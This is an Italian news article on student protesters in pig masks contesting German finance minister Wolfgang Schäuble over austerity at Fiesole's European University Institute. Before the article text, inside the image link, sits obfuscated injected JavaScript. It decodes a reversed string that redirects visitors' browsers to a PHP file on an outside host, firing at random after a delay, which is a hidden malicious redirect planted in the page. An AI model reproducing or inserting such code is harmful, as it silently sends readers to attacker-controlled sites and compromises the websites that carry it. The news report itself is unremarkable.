MAIALI Contestato a Fiesole il ministro tedesco delle finanze

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://altracitta.org/wp-content/uploads/2012/03/maiali.jpg”>Contestazione all’Istituto universitario europeo di Fiesole. Gli studenti del collettivo ‘Prezzemolo’ hanno contestato il ministro delle Finanze tedesco Wolfgang Schauble, prima della sua conferenza. Gli studenti, circa una ventina, hanno utilizzato in varie forme lo slogan ‘P.I.I.G.S’ (invece di pigs, ‘maiali’) come acronimo di Portogallo, Irlanda, Italia, Grecia e Spagna. Sono questi i Paesi che, secondo i contestatori, hanno subito più danni, in termini sociali, per le politiche di austherity.

E’ stato esposto uno striscione con scritto ‘We are all Piigs’, un altro in cui si legge ‘End Austherity’. Sono stati distribuiti volantini al pubblico della conferenza. Alcuni studenti indossano una maschera da maiale.

”Sono felice che voi manifestiate la vostra solidarieta’ con la Grecia e con altri paesi, e’ giusto, siete giovani. Ma non mi piacciono le vostre maschere, cosa vuol dire la maschera da maiale?”.

Così il ministro delle Finanze tedesco, Wolfgang Schauble, ha risposto ai manifestanti. Il ministro ha quindi ribadito che per far grande l’Europa ”ci vogliono infrastrutture ma anche un sistema finanziario stabile”.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *